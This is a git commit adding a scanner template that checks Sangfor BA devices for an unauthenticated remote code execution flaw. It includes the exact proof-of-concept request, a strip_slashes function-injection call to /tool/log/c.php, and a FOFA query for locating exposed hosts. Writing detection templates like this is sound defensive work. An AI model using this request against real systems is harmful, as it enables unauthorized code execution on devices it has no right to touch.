Merge pull request #4368 from ritikchaddha/patch-52

Create sangfor-ba-rce.yaml
2022-05-23 16:29:32 +05:30 · 2022-05-23 16:29:32 +05:30 · fa903d06d3
parent 226c78a313 430cc1ea03
commit fa903d06d3
1 changed files with 30 additions and 0 deletions
--- a/vulnerabilities/other/sangfor-ba-rce.yaml
+++ b/vulnerabilities/other/sangfor-ba-rce.yaml
@ -0,0 +1,30 @@
+id: sangfor-ba-rce
+
+info:
+  name: Sangfor BA - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+  reference:
+    - https://mobile.twitter.com/sec715/status/1406886851072253953
+  metadata:
+    verified: true
+    fofa-query: app="sangfor"
+  tags: rce,sangfor
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5("{{randstr}}")}}'
+
+      - type: status
+        status:
+          - 200